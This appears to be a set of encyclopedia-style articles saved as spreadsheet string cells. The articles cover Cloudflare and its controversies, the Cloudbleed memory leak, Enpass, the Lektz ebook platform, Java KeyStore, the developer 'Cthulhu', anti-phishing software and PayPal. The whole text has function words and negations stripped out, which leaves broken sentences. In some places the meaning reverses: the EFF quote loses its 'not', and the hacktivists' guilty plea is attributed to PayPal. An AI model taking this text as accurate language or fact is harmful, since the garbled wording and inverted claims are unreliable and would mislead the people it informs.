november, 2020, cloudflare announced cloudflare teams, consisting resolver gateway called "gateway," zero-trust authentication service called "access."on 2022, cloudflare announced first database, built sqlite. free services 2014, cloudflare began providing free ddos mitigation artists, activists, journalists, human rights groups name "project galileo." more 1,000 users organizations participating project galileo 2020. 2017, extended service electoral infrastructure political campaigns name "athenian project." december 2020, cloudflare released beta jamstack platform front-end developers deploy websites cloudflare's infrastructure, name "pages." january 2021, company began providing "waiting room" digital queue product free covid-19 vaccination scheduling title "project fair shot." project fair shot later webby people's choice award 2022 event management apps software category. security privacy issues intrusions june 2012, hacker group ugnazi redirected visitors website 4chan twitter account belonging ugnazi “hijacking” 4chan’s domain cloudflare. after initiating password recovery google workspace hosted email account cloudflare matthew prince, ugnazi allegedly used social engineering trick at&amp;t support staff giving access voicemail. exploiting google app’s two-factor authentication security procedures, hackers allegedly used voicemail-recovered password access prince’s email account without second layer authentication. once control prince’s email account, able redirect 4chan domain cloudflare’s database.in march 2021, tillie kottmann hacking collective "advanced persistent threat 69420" demonstrated group gained root shell access security cameras cloudflare offices managed cloud-based physical security company verkada obtaining credentials verkada superuser account leaked internet. cloudflare stated compromised cameras offices officially closed several months, though hacking collective also obtained access verkada-operated cameras cloudflare's offices york city, london, austin francisco. hacking group told bloomberg news video archives verkada customers; accessed footage cloudflare's cameras posted screenshot security footage said taken verkada camera cloudflare office. data leaks from september 2016 february 2017, major cloudflare (nicknamed cloudbleed) leaked sensitive data, including passwords authentication tokens, customer websites sending extra data response requests. leaks resulted buffer overflow occurred, according numbers provided cloudflare time, 18,000,000 times problem corrected.in 2017, propublica reported cloudflare routinely discloses names email addresses persons complaining hate sites operators sites, complainants harassed. cloudflare's general counsel defended company's policies saying "base constitutional people face accusers", noted disclaimer cloudflare's complaint form since 2015 stating "would notify site owner." cloudflare's later suggested that, people wanted names shared, provided false name reporting form. service outages there major outage lasting minutes, july 2019 attributed software deployment. 2020, misconfiguration router caused data pileup outage major european cities. cloudflare experienced another outage june 2022. controversies cloudflare criticized banning websites hate speech content. company said content neutrality policy opposes policing customers free speech grounds, except cases customers break law. company also faced criticism banning websites allegedly connected terrorism groups, cloudflare maintained enforcement agency asked company discontinue services closely monitors obligations u.s. laws. free speech debate cloudflare come pressure multiple occasions services utilized serve controversial content. cloudflare considered infrastructure provider, rather hosting provider, able maintain broad legal immunity content served customers.cloudflare provided routing protection white supremacist neo-nazi website, daily stormer. 2017 cloudflare stopped providing services daily stormer announcement controversial website asserted "upper echelons" cloudflare "secretly supporters ideology". previously cloudflare refused take action regarding daily stormer. self-described "free speech absolutist", cloudflare's matthew prince, blog post, vowed never succumb external pressure sought create "political umbrella" future. prince addressed dangers large companies deciding allowed stay online, concern shared number civil liberties groups privacy experts. electronic frontier foundation, digital rights group, said services cloudflare "should adjudicating speech acceptable", adding "when illegal activity, like inciting violence defamation, occurs, proper channel deal legal system." terrorism huffington post documented cloudflare's services least terrorist groups", designated united states department state including taliban, al-shabaab, al-aqsa martyrs' brigades, hamas, myanmar's military junta, al-quds brigades. cloudflare aware since least 2012, taken action. however, according cloudflare's ceo, enforcement agency asked company discontinue services. three online chat forums nearly forty sites belonging islamic state iraq levant (isil) guarded cloudflare. according prince, u.s. enforcement asked cloudflare discontinue service, chosen itself. november 2015, hacktivist group anonymous discouraged cloudflare's services following isil attacks paris additional revelations cloudflare aids terrorists. cloudflare responded calling group "15-year-old kids fawkes masks", saying whenever concerns raised consults anti-terrorism experts abides law. mass shootings 8chan 2019, cloudflare criticized providing services discussion imageboard 8chan, allows users post discuss content minimal interference site administrators. message board linked mass shootings united states christchurch mosque shootings zealand. addition, number news organizations including washington post daily reported existence child pornography child sexual abuse discussion boards.a cloudflare representative stated platform "does host referenced websites, cannot block websites, business hiding companies host illegal content". cloudflare terminate service 8chan public legal pressure wake copycat shooting christchurch mosque shootings united states, used 8chan publish associated manifesto. interview guardian, immediately following 2019 paso shooting, matthew prince defended cloudflare's support 8chan, stating "moral obligation" keep site online.a days later cloudflare terminated service 8chan result website taken clearnet. crime cloudflare services used rescator, carding website sells stolen payment card data.in 2018, cloudflare identified european union's counterfeit piracy watch list "notorious market" engages facilitates, benefits counterfeiting piracy. report noted cloudflare hides anonymizes operators world's pirate sites, largest sites, "does follow diligence opening accounts websites prevent illegal sites using services." italian courts enjoined cloudflare cease hosting pirate television service "iptv best" found infringing intellectual property italy italian football league, german courts similarly found "cloudflare anonymization services attract structurally copyright infringing websites."cloudflare cited reports spamhaus project, international spam tracking organization, high numbers cybercriminal botnet operations hosted cloudflare. october 2015 report found cloudflare provisioned certificates used typosquatting phishing sites, deceptive domain names resembling banks payment processors compromise internet users' banking transactions. reaction 2022 russian invasion ukraine after russia invaded ukraine late february 2022 ukrainian vice prime minister mykhailo fedorov others called cloudflare stop providing services russian market amidst reports russia-linked websites spreading disinformation using company’s content delivery network services. cloudflare matthew prince responded “[i]ndiscriminately terminating service would little harm russian government would limit [russian citizens’] access information outside country make significantly vulnerable used shield criticized government.” company later said minimal sales commercial activity russia "terminated customers identified tied sanctioned entities."cloudflare's project galileo, launched 2014, offers ngos ddos protection free. 2022, extended free protection ukrainian government telecoms. references external links official website business data cloudflare, inc.:</t>
  </si>
  <si>
    <t>Cloudbleed</t>
  </si>
  <si>
    <t>cloudbleed cloudflare buffer overflow disclosed project zero february 2017. cloudflare's code disclosed contents memory contained private information customers, http cookies, authentication tokens, http post bodies, sensitive data. result, data cloudflare customers leaked cloudflare customers access server memory. this occurred, according numbers provided cloudflare time, 18,000,000 times problem corrected. some leaked data cached search engines. discovery discovery reported google's project zero team. tavis ormandy posted issue team's issue tracker said informed cloudflare problem february proof-of-concept attack cloudflare server return "private messages major dating sites, full messages well-known chat service, online password manager data, frames adult video sites, hotel bookings. we're talking full https requests, client addresses, full responses, cookies, passwords, keys, data, everything." similarities heartbleed effects, cloudbleed comparable 2014 heartbleed bug, allowed unauthorized third parties access data memory programs running servers, including data shielded transit tls. cloudbleed also likely impacted many users heartbleed since affected content delivery network serving nearly million websites.tavis ormandy, first discover vulnerability, immediately drew comparison heartbleed, saying took every ounce strength call issue 'cloudbleed'" report. reactions cloudflare thursday, february 2017, cloudflare wrote post noting that:the serious leaked memory could contain private information cached search engines. also discovered evidence malicious exploits reports existence. greatest period impact february february around every 3,300,000 http requests cloudflare potentially resulting memory leakage (that’s 0.00003% requests).cloudflare acknowledged memory could leaked early september 2016. company also stated private keys, used machine-to-machine encryption, leaked. turned underlying caused memory leak present ragel-based parser many years memory leaked internal nginx buffers used. introducing cf-html subtly changed buffering enabled leakage even though problems cf-html itself. john graham-cumming, cloudflare cto, noted cloudflare clients, uber okcupid, directly informed leaks security risks involved situation. “there backdoor communication outside cloudflare google search engines,” said.graham-cumming also said "unfortunately, ancient piece software contained latent security problem problem showed process migrating away it." added team already begun testing software possible issues. google project zero team tavis ormandy initially stated "really impressed cloudflare's quick response, dedicated cleaning unfortunate issue." however, ormandy pressed cloudflare additional information, "they gave several excuses make sense," sending draft "severely downplays risk customers." uber uber stated impact service limited. uber spokesperson added "only handful session tokens involved since changed. passwords exposed." okcupid okcupid elie seidman said: "cloudflare alerted last night we've looking impact okcupid members. initial investigation revealed minimal, any, exposure. determine users impacted promptly notify take action protect them." fitbit fitbit stated investigated incident found "handful people affected". they recommended concerned customers change passwords clear session tokens revoking re-adding account. remediation many major news outlets advised users sites hosted cloudflare change passwords, even accounts protected multi-factor authentication could risk. passwords mobile apps could impacted. researchers arbor networks, alert, suggested "for truly safe response large-scale information leak update passwords sites app-related services every day...pretty much them."inc. magazine cybersecurity columnist, joseph steinberg, however, advised people change passwords, stating "the current risk much smaller price paid increased 'cybersecurity fatigue' leading much bigger problems future." references external links list domains using cloudflare github simple website lets check affected domains quickly chrome extension checks bookmarks potentially affected domains cloudbleed explained-how biggest cache leak internet happened quantifying impact cloudbleed</t>
  </si>
  <si>
    <t>ErrorGuard</t>
  </si>
  <si>
    <t>Enpass</t>
  </si>
  <si>
    <t>enpass cross-platform offline password management securely store passwords credentials virtual vault locked master password. store user data servers, locally devices, encrypted. users choose synchronize data different devices using preferred cloud storage service like google drive, box, dropbox, onedrive, icloud, webdav. mobile version restricted storing passwords free charge, although functionality available price. desktop version, however, unlimited. november 2017, developers stopped issuing updates blackberry platform december 2018, launch company dropped support windows mobile. 2016, windows central rated enpass best windows mobile, several technology publications like computerworld, cnet, macworld, imore, android police, android central, android authority included enpass list best password managers. features application features client-side encryption, using sqlcipher encrypt keychain file locally user-defined master password. features cloud synchronization keychain google drive, box, dropbox, onedrive, icloud self-hosted webdav solutions owncloud nextcloud. features cross browser platform support form filling supported platforms. features integrated software keyboard form filling android devices. password generation. besides master password, functionality unlocking using biometric authentication. december 2018, enpass released additional features including multiple vaults ability generate time-based one-time passwords online services. platforms enpass support major operating system platforms include, windows linux android apple also list password managers cryptography comparison password managers password manager references external links official website</t>
  </si>
  <si>
    <t>Lektz</t>
  </si>
  <si>
    <t>lektz ebook business platform developed data, operating india. solutions available lektz platform include drm, ebook reader applications, virtual book store, ebook conversion, elending, consumer analytics, digital marketing solutions small, medium-sized publishers independent authors. m.s. mohammed sadiq, vice president data, chief architect lektz platform draws support data's epublishing, digitization, accessibility solutions, application development services. lektz platform launched saas based solution on-premises solution using publisher's infrastructure. this solution presented ebook ecosystem london book fair 2013, dr.sadiq lindsay macleod, executive director data. lektz ebook reader reader application android, devices, reader (web-based/google chrome extension).it supports pdf, epub2 epub3 ebook formats. launched data services may, 2012. lektz reader provides full support non-drm ebooks support limited ebooks secured using lektz proprietary drm. lektz ebook reader supports fixed layout freeflow epub across varied platforms. works lektz saas based solution publishers sign create branded ebook stores, upload epub ebooks encrypt using lektz drm, configure payment gateway start selling ebooks lektz platform. on-premises solution ebookstore, elending, payment gateway solutions integrated publisher website. lektz proprietary ebook technology data. lektz secures ebooks copied transmitted without appropriate rights permissions. when publishers upload ebooks lektz platform, choose enable security ebooks decrypted synced lektz reader.there three levels protection: ebook encryption ebook accessing device control user account credentials verificationthe lektz mechanism designed closed system, implemented protecting ebooks system software, also acts ebook reader (lektz reader). secure ebooks, ebooks sold publisher's website embedded security mechanism, permitted open using lektz e-reader software. lektz integrated publishers’existing websites portals secure ebooks piracy provide secured platform sell distribute books online. ebook reader lektz ebook reader reader application android, (stand-alone google chrome extension).it supports pdf, epub2 epub3 ebook formats. launched data services may, 2012. lektz reader provides full support non-drm ebooks support limited ebooks secured using lektz proprietary drm. lektz ebook reader supports freeflow epub across varied platforms. exclusive variant lektz reader al-lektz, developed distinctively middle-east north african ebook users. default (right left) orientation arabic compatible user interface. dyslektz ebook reader another exclusive application launched first week june 2013 google play apple store. this reader intended enable users dyslexia read ebooks smartphones tablets. ebook imported dyslektz reader converted opendyslexic font makes digital content accessible dyslexics. elending elending solution developed lektz adds online library functionality publisher's website ebooks borrowed reader application periodic subscription. lektz incorporates component standalone well integrated solution publisher website. ebook store ebook store major components lektz ebook business solution. publishers virtual e-book store lektz platform upload manage e-books make available sales. also provides back-end content management system publishers track manage sales view consumer analytics. references</t>
  </si>
  <si>
    <t>Java KeyStore</t>
  </si>
  <si>
    <t>java keystore (jks) repository security certificates either authorization certificates public certificates plus corresponding private keys, used instance encryption. websphere application server oracle weblogic server, file extension serves keystore. java development maintains keystore file named cacerts folder jre/lib/security. jdks provide tool named keytool manipulate keystore. keytool functionality extract private keystore, possible third-party tools like jksexportkey, certivity, portecle keystore explorer. also java secure socket extension keyring (cryptography) public-key infrastructure references external links javadoc keystore</t>
  </si>
  <si>
    <t>Cthulhu (developer)</t>
  </si>
  <si>
    <t>cthulhu thomas white british hidden service developer administrator. activities involved consulted number security matters dark scams, enforcement raids darknet markets.he hosted number data dumps including associated hacking team, ashley madison, patreon.in january 2016 hosted release files hacked fraternal order police. arrest silk road november 2014, white arrested mastermind behind silk road april 2019, white pleaded guilty charges including drug trafficking, money laundering, well making indecent images children, sentenced total years months prison. external links personal site personal site references</t>
  </si>
  <si>
    <t>Anti-phishing software</t>
  </si>
  <si>
    <t>anti-phishing software consists computer programs attempt identify phishing content contained websites, e-mail, forms used accessing data (usually internet) block content, usually warning user (and often option view content regardless). often integrated browsers email clients toolbar displays real domain name website viewer visiting, attempt prevent fraudulent websites masquerading legitimate websites. most popular browsers comes built-in anti-phishing anti-malware protection services, almost none alternate browsers protections.password managers also used help defend phishing, mutual authentication techniques. notable client-based anti-phishing programs avast! avira premium security suite earthlink scamblocker (discontinued) ebay toolbar egress defend eset smart security data software data antivirus geotrust trustwatch google safe browsing (used mozilla firefox, google chrome, opera, safari, vivaldi) kaspersky internet security mcafee siteadvisor microsoft smartscreen (used microsoft edge, internet explorer, microsoft outlook) mozilla thunderbird netcraft toolbar netscape norton norton internet security phishtank sitechecker quick heal windows mail default windows vista e-mail client (web trust) browser extension zonealarm service-based anti-phishing google safe browsing opendns phishtank anti-phishing effectiveness independent study conducted carnegie mellon university cylab titled "phinding phish: evaluation anti-phishing toolbars" released november 2006 tested ability anti-phishing solutions block warn known phishing sites block warn legitimate sites (not exhibit false-positives), well usability solution. solutions tested, netcraft toolbar, earthlink scamblocker spoofguard able correctly identify sites tested, netcraft toolbar receiving highest score without incorrectly identifying legitimate sites phishing. severe problems however discovered using spoofguard, incorrectly identified tested legitimate sites phishing, leading conclusion "such inaccuracies might nullify benefits spoofguard offers identifying phishing sites." google safe browsing (which since built firefox) internet explorer performed well, testing ability detect fresh phishes netcraft toolbar scored high 96%, google safe browsing scored possibly technical problems google safe browsing. testing performed using phishing data obtained anti-phishing working group, phishtank, unnamed email filtering vendor.another study, conducted smartware mozilla released november 2006, concluded anti-phishing filter firefox effective internet explorer 10%. results study questioned critics, noting testing data sourced exclusively phishtank, anti-phishing provider. study compared internet explorer firefox, leaving (among others) netcraft toolbar opera browser, data phishtank anti-phishing solutions. this speculations that, limited testing data, opera netcraft toolbar would gotten perfect score part study.while directly aforementioned reports released apart, dotzler, director community development mozilla, responded criticism mozilla-commissioned report saying, agreeing recent legitimate data puts firefox ahead. good enough me."since studies conducted, microsoft opera software started licensing netcraft's anti-phishing data, bringing effectiveness browser's built-in anti-phishing netcraft toolbar beyond. also mutual authentication two-factor authentication note: almost two-factor techniques also susceptible phishing. references external links anti-phishing software curlie</t>
  </si>
  <si>
    <t>PayPal</t>
  </si>
  <si>
    <t>paypal holdings, inc. american multinational financial technology company operating online payments system majority countries support online money transfers, serves electronic alternative traditional paper methods checks money orders. company operates payment processor online vendors, auction sites many commercial users, charges fee. established 1998 confinity, paypal went public 2002. became wholly owned subsidiary ebay later year, valued $1.5 billion. 2015 ebay spun paypal shareholders, paypal became independent company again. company ranked 143rd 2022 fortune largest united states corporations revenue. history early history paypal originally established levchin, peter thiel, luke nosek december 1998 confinity, company developed security software hand-held devices. having success business model, however, switched focus digital wallet. first version paypal electronic payments system launched 1999.in march 2000, confinity merged x.com, online financial services company founded march 1999 elon musk, harris fricker, christopher payne, musk optimistic future success money transfer business confinity developing. musk bill harris, then-president x.com, disagreed potential future success money transfer business harris left company 2000. october year, musk decided x.com would terminate internet banking operations focus paypal. that month, elon musk replaced peter thiel x.com, renamed paypal 2001 went public 2002. paypal's listed ticker pypl share generated million. ebay subsidiary (2002–2014) shortly paypal's ipo, company acquired ebay october 2002, $1.5 billion ebay stock. more percent ebay auctions accepted paypal payments, roughly closed auction listings transacted paypal. paypal became default payment method used majority ebay users, service competed ebay's subsidiary billpoint, well citibank's c2it, yahoo!'s paydirect, google checkout.in 2005, paypal acquired verisign payment solution provide added security support. 2007, paypal announced partnership mastercard, development launch paypal secure card service, software allows customers make payments websites accept paypal directly. 2007, company generated $1.8 billion revenue.in january 2008, paypal acquired fraud sciences, privately held israeli start-up developed online risk tools, $169 million. november 2008, company acquired bill later, online transactional credit company.by 2010, paypal million active user accounts markets different currencies. july 2011, fourteen alleged members anonymous hacktivist group charged attempting disrupt paypal's operations. denial service attacks occurred december 2010, paypal stopped processing donations wikileaks. december 2013, paypal pleaded guilty misdemeanor felony charges related attacks.the company continued build merchant services division, providing e-payments retailers ebay. 2011, paypal announced would begin moving business offline customers make payments paypal stores. august 2012, company announced partnership discover card allow paypal payments made million stores discover card's network. 2012, paypal's total payment volume processed us$145 billion. accounted ebay's revenue, amounting us$1.37 billion quarter 2012.in 2013, paypal acquired ironpearl, palo alto startup offering engagement software, braintree, chicago-based payment gateway, product development mobile services. june 2014 david marcus announced leaving role paypal president; marcus joined paypal august 2011 acquisition zong, founder ceo. david marcus succeeded scott thompson president, left role join yahoo. paypal announced marcus would succeeded schulman, previously served virgin mobile executive vice president american express. spin-off ebay (2014–present) announced september 2014, ebay would spin paypal separate publicly traded company, move demanded 2013 activist hedge fund magnate carl icahn. spin-off completed july 2015. schulman current president ceo, former ebay john donahoe serving chairman. january 2018, ebay announced "after existing ebay-paypal agreement ends 2020, paypal remain payment option shoppers ebay, prominently featured ahead debit credit card options today. paypal cease process card payments ebay time." company "instead begin working amsterdam-based adyen".on july 2015, paypal announced acquiring digital money transfer company xoom corporation. paypal spent share cash acquire publicly traded xoom, $1.09 billion. deal closed fourth quarter 2015. move strengthened paypal’s international business, giving access xoom’s million active u.s. customers sent billion months ending march people countries.on september 2015, paypal launched peer-to-peer payment platform "paypal.me", service allows users send custom link request funds text, email, messaging platforms. custom links structured paypal.me/username/amount requested. paypal.me launched countries including united states, united kingdom, germany, australia, canada, russia, turkey, france, italy, spain, poland, sweden, belgium, norway, denmark, netherlands, austria switzerland. paypal million users, september 2015, focus paypal.me create mobile-first user experience enables faster payment sharing paypal's traditional tools.on 2018, paypal agreed purchase swedish payment processor izettle $2.2 billion. this paypal's largest acquisition late november 2019 company claims in-store expertise digital marketing strength complement online mobile payment services.on march 2019, paypal announced partnership instagram part company's checkout feature, "checkout instagram".in june 2019, paypal reported chief operating officer bill ready would leaving company year. december 2019, google announced ready would become commerce chief.on january 2020, paypal acquired honey billion. this paypal's largest acquisition date, recent. recently signed deal nbcuniversal.in january 2021, paypal became first foreign operator 100% control payment platform china, gaining advanced position local online payment market.in international survey conducted march 2021 morning consult, paypal found second trusted brand globally.on october 2021, bloomberg reported paypal interested acquiring pinterest, potential price around share, there’s certainty talks lead agreement. acquisitions july 2022, paypal blocked indonesia failing comply electronic system licence rules. finances fiscal year paypal january december fiscal year 2019, paypal reported earnings us$2.459 billion, annual revenue $17.772 billion, increase previous fiscal cycle. paypal's shares traded $108 share, market capitalization valued $127.58 billion december 2019. covid-19 pandemic accelerated growth digital payment platforms, including paypal, expense traditional banking sector. result, paypal seen increase stock 2020 october. addition, total payment volume increased amounting $220 billion increasing positive investor sentiment. offices paypal's corporate headquarters located north jose innovation district jose, california, north first street campus. company's operations center located vista, nebraska, opened 1999. since july 2007, paypal operated across european union luxembourg-based bank. paypal european headquarters located luxembourg international headquarters singapore. paypal opened technology center scottsdale, arizona 2006, software development center chennai, india 2007. october 2007, paypal opened data service office north side austin, texas, also opened second operations center vista, nebraska year. 2011, joining similar customer support operations located berlin, germany; chandler, arizona; dublin dundalk, ireland; omaha, nebraska; shanghai, china; paypal opened second customer support center kuala lumpur, malaysia, began hiring process. 2014, paypal opened global center operations kuala lumpur. services paypal's services allow people make financial transactions online granting ability transfer funds electronically individuals businesses. through paypal, users send receive payments online auctions websites like ebay, purchase sell goods services, donate money receive donations. necessary paypal account company's services. paypal account users currency conversion option account settings.the paypal available online itunes store google play. year acquiring braintree, paypal introduced "one touch" service, allows users one-touch option participating merchants websites apps.in 2007, paypal acquired online credit product bill later, inc., since rebranded paypal credit provided services comenity capital bank, lender paypal credit accounts. founded 2000, bill later headquartered timonium, maryland. paypal credit offers shoppers access instant online revolving line credit thousands vendors accept paypal, subject credit approval. paypal credit allows consumers shop online much would traditional credit card. rebranding bill later paypal credit also means consumers paypal credit fund transactions virtually anywhere paypal accepted. 2015 paypal agreed paypal credit would million fine settle complaint filed federal court consumer financial protection bureau.from 2009 2016, paypal operated student accounts, allowing parents student account, transfer money obtain debit card student use. program provided tools teach spend money wisely take responsibility actions. paypal discontinued student accounts august 2016. november 2009, paypal partially opened platform, allowing services access apis infrastructure order enable peer-to-peer online transactions.on november 2011, paypal reported black friday brought record mobile engagement including 538% increase global mobile payment volume compared black friday 2010.in 2012, company launched "paypal here", small business mobile payment system includes combination free mobile small card-reader plugs smart phone.paypal launched updated android 2013 expanded mobile capabilities allowing users search local shops restaurants accept paypal payments, order ahead participating venues, access paypal credit accounts (formerly known bill later).on october 2020, paypal announced service allowing customers cryptocurrencies shop million merchants network starting 2021. paypal using paxos trust provide back infrastructure allowing users manage trade cryptocurrencies accordance data privacy rules financial regulations. paxos charge acquiring necessary regulatory approvals paypal facilitate cryptocurrency assets. part announcement, paypal secured first conditional cryptocurrency license york state department financial services, allow customers purchase cryptocurrencies bitcoin, litecoin, ethereum, bitcoin cash. march 2022, paypal introduced flat-fee structure cryptocurrency transactions $200; transactions $200 incur 1.8% purchases sales $1,000, 1.5% transaction amount greater $1,000.as 2022, paypal operates markets million active, registered accounts. paypal allows customers send, receive, hold funds currencies worldwide. business model evolution paypal's success users volumes product three-phase strategy described former ebay whitman: "first, paypal focused expanding service among ebay users second, began expanding paypal ebay's international sites. third, started build paypal's business ebay." phase first phase, payment volumes coming mostly ebay auction website. system attractive auction sellers, individuals small businesses unable accept credit cards, consumers well. fact, many sellers could qualify credit card merchant account lacked commercial credit history. service also appealed auction buyers could fund paypal accounts using credit cards bank account balances, without divulging credit card numbers unknown sellers. paypal employed aggressive marketing campaign accelerate growth, depositing users' paypal accounts. phase until 2000, paypal's strategy earn interest funds paypal accounts. however, recipients paypal credits withdrew funds immediately. also, many senders funded payments using credit cards, cost paypal roughly payment value transaction.to solve problem, paypal tailored product cater business accounts. instead relying interests earned deposited funds, paypal started relying earnings service charges. they offered seller protection paypal account holders, provided comply reimbursement policies. example, paypal merchants either required retain traceable proof shipping confirmed address provide signed receipt items valued $750. phase after fine-tuning paypal's business model increasing domestic international penetration ebay, paypal started off-ebay strategy. this based developing stronger growth active users adding users across multiple platforms, despite slowdown on-ebay growth low-single-digit user growth ebay site. late 2003 reorganization created business unit within paypal—merchant services—to provide payment solutions small large e-commerce merchants outside ebay auction community. starting second half 2004, paypal merchant services unveiled several initiatives enroll online merchants outside ebay auction community, including: lowering transaction high-volume merchants 2.2% 1.9% (while increasing monthly transaction volume required qualify lowest $100,000) encouraging users recruit non-ebay merchants increasing referral bonus maximum $1,000 (versus previous $100 cap) persuading credit card gateway providers, including cybersource retail decisions usa, include paypal among offerings online merchants. hiring sales force acquire large merchants dell, apple's itunes, yahoo! stores, hosted thousands online merchants reducing fees online music purchases "micropayments" launching paypal mobile, allowed users make payments using text messaging cell phones global reach paypal used countries/regions.different countries different conditions: send (package service allows sending only, valid countries), paypal zero (package suggests possibility enrollment, entry, withdrawal funds foreign currency, user hold balance paypal account, operates countries), send receive withdrawal (the possibility enrollment, input-output ability keep paypal account balance currency transfer card user sees fit, operates countries) local currency (srw plus opportunity conduct transactions local currency, countries). china july 2017, paypal announced partnership baidu, allow chinese firm’s million mobile wallet users make payments paypal’s million merchants baidu service. crimea january 2015, paypal ceased operations crimea compliance international sanctions russia crimea. india march 2011, paypal made changes user agreement indian users comply reserve bank india regulations. transaction limit $3,000, since october 2011. however, july 2013, paypal increased transaction limit $10,000. this brings transaction limit india line restrictions imposed paypal countries. paypal disabled sending receiving personal payments india, thus forcing recipients transaction fee.paypal plans make india incubation center company's employee engagement policies. 2012, paypal hired people offices chennai bengaluru.on november 2017, paypal launched domestic operations paypal payments private limited provides digital payment solutions merchants customers india. 2020, paypal supports domestic card system rupay planning integrate unified payment interface (upi) collaboration national payments corporation india (npci). paypal largest global engineering team india outside spread bengaluru, chennai hyderabad. israel palestinian territories paypal available israel available palestinian territories. palestinians working west bank gaza access israelis living settlements west bank paypal. this decision prompted palestinian tech companies seek policy change paypal. japan late march 2010, japanese banking regulations forced paypal japan suspend ability personal account holders registered japan sending receiving money individuals result subject paypal's business fees transactions. pakistan pakistan, users xoom, money transfer service owned paypal. october 2018, pakistan's government used xoom help crowdsource funds purpose building dams.the government pakistan trying convince paypal administration launch service country, paypal ready introduce services there. turkey eight years company first started operating country, paypal ceased operations turkey june 2016 turkish financial regulator bddk denied payment license. regulators demanded paypal's data centers located inside turkey facilitate compliance government court orders block content generate revenue. paypal said closure affect tens thousands businesses hundreds thousands consumers turkey. lanka january 2017, paypal team scheduled visit lanka mid-january re-establish links. 2021, paypal operate country. russia march 2022, paypal suspended activities russia 2022 russian invasion ukraine. ukraine march 2022, paypal expanded services ukrainian accounts, allowing send receive money friends family. previously, paypal users ukraine could send money internationally accounts, receive kenya 2018, paypal safaricom collaborated enable kenyans perform paypal mpesa transactions leveraging latter's mobile money service. indonesia july 2022, kominfo blocked paypal regulation. many paypal users indonesia concerned, stored money platform. service temporarily unblocked days users withdraw money platform. main reason paypal permit bank indonesia otoritas jasa keuangan. paypal unblocked august 2022 registering. paypal giving fund paypal giving fund registered charity supported paypal streamlines donations non-profit organizations. digital marketing paypal paypal launches different marketing activities various channels emphasizes consumers different ways. paypal's marketing includes commercials, outdoor advertising, facebook, display advertisement.paypal provides free analytics traders ways consumers utilize online payments. through free tracking service, paypal assists traders targeting consumers. paypal's code gathers consumer information installed trader's website. both paypal traders benefit free service. paypal partners synchrony financial provide paypal cashback mastercard, offers cash back customers card make purchases online physical stores. paypal’s cashback financial service promotes number potential customers. apple allows paypal mode payment store, apple music, itunes, apple books. paypal increase usage apple platforms. addition, paypal receives revenue apple services, especially store. customers paypal make purchases linking paypal accounts apple ids. regulation thiel, founder paypal, stated paypal bank engage fractional-reserve banking. rather, paypal's funds disbursed kept commercial interest-bearing checking accounts.in united states, paypal licensed money transmitter, state-by-state basis. state laws vary, definitions banks, narrow banks, money services businesses, money transmitters. although paypal classified bank, company subject rules regulations governing financial industry including regulation consumer protections patriot act. analogous regulatory source paypal transactions comes peer-to-peer (p2p) payments using credit debit cards. ordinarily, credit card transaction, specifically relationship issuing bank cardholder, governed truth lending (tila) u.s.c. 1601-1667f implemented regulation c.f.r. 226, (tila/z). tila/z requires specific procedures billing errors, dispute resolution, limits cardholder liability unauthorized charges. similarly, legal relationship debit cardholder issuing bank regulated electronic funds transfer (efta) u.s.c. 1693-1693r, implemented regulation c.f.r. 205, (efta/e). efta/e directed consumer protection provides strict error resolution procedures. however, paypal payment intermediary otherwise regulated directly, tila/z efta/e operate exactly written credit/debit card transaction occurs paypal. basically, unless paypal transaction funded credit card, consumer recourse event fraud seller.in 2008, paypal europe granted luxembourg banking license, which, european union law, allows conduct banking business throughout therefore regulated bank luxembourg's banking supervisory authority, commission surveillance secteur financier (cssf). company's european accounts transferred paypal's bank luxembourg july 2007. prior move, paypal registered united kingdom paypal (europe) ltd, entity licensed electronic money issuer uk's financial services authority (fsa) 2004. this ceased 2007, company moved luxembourg.in india, january 2010, paypal cross-border money transfer authorization. york times article "india's central bank stops some paypal services", reserve bank india spokesman alpana killawalla stated: "providers cross-border money transfer service need prior authorization reserve bank payment settlement systems act, paypal authorization." paypal listed "certificates authorisation issued reserve bank india payment settlement systems act, 2007 setting operating payment system india". paisapay indian sister service paypal. also owned ebay. paisapay makes possible payments abroad paypal account holders indian sellers ebay.in. australia, paypal licensed authorised deposit-taking institution (adi) thus subject australian banking laws regulations.in singapore, paypal holder stored value facility require approval monetary authority singapore. safety protection policies paypal buyer protection policy states customer file buyer complaint receive item item purchased significantly described. customer open dispute within days date payment escalate claim within days opening dispute. buyer used credit card, might refund chargeback credit-card company. however, purchaser entitled specific statutory protections (that credit card company second party purchase therefore equally liable party defaults goes liquidation) section consumer credit 1974, purchaser loses legal protection card payment processed paypal.also, financial ombudsman service (for u.k.) position section protection apply paypal emoney service becomes involved credit card transaction. this leaves consumers recourse pursue complaint financial ombudsman service. they would recourse courts, event cannot paypal incorporated luxembourg and, since left longer within jurisdiction courts. issues determine applicability section identified clearly office fair trading lloyds bank others [2006] ewca bank scotland alfred truman firm) [2005] [ewhc] (qb). this legal authority section protection exist paid credit card product, emoney service.according paypal, protects sellers limited fashion seller protection policy. general, seller protection policy intended protect seller certain kinds chargebacks complaints seller meets certain conditions including proof delivery buyer. paypal states seller protection policy "designed protect sellers claims buyers unauthorized payments claims non-receipt merchandise". policy includes list "exclusions" includes "intangible goods", "claims receipt goods 'not described'", "total reversals annual limit". there also restrictions terms sale itself, payment method destination country item shipped (simply tracking mechanism sufficient guarantee seller protection policy effect). paypal seller protection policy provide additional consumer protection afforded consumer legislation (most notably consumer rights 2015) addition, cannot enforced courts paypal operates luxembourg, outside three legal jurisdictions. security security token early 2006, paypal introduced optional security additional precaution fraud. user account tied security modified login process. account-holders enter login password normal prompted enter six-digit code provided credit card sized hardware security text message sent account holder's mobile phone. convenience, users append code generated hardware password login screen. this prompted another page. this method required services, using paypal ebay application iphone. this two-factor authentication intended make difficult account compromised malicious third party without access physical security key, although prevent so-called browser (mitb) attacks. however, user malicious third party) alternatively authenticate providing credit card bank account number listed account. thus paypal implementation offer security true two-factor authentication. mtan also possible mobile phone receive mtan (mobile transaction authentication number) sms. security code sent account holder's mobile phone currently free. fraud early 2001, paypal substantial problems online fraud, especially international hackers hacking paypal accounts transferring small amounts money multiple accounts. standard solutions merchant banking fraud might government criminal sanctions pursue fraudsters. paypal losing millions dollars month fraud experiencing difficulties using pursue cases international fraud, paypal developed fraud monitoring system detect potentially fraudulent transactions. this development fraud monitoring software paypal peter thiel create palantir, big-data security company whose original mission "reduce terrorism preserving civil liberties." 150,000 paypal cards frozen 2015, 150,000 spanish card holders funds frozen apparent fraud case involving paypal service provider, younique money, facto administrator cards. previously, paypal charged card users without authorization (150,000 users). march 2015 funds returned. criticism controversies 2003, paypal voluntarily ceased serving payment intermediary 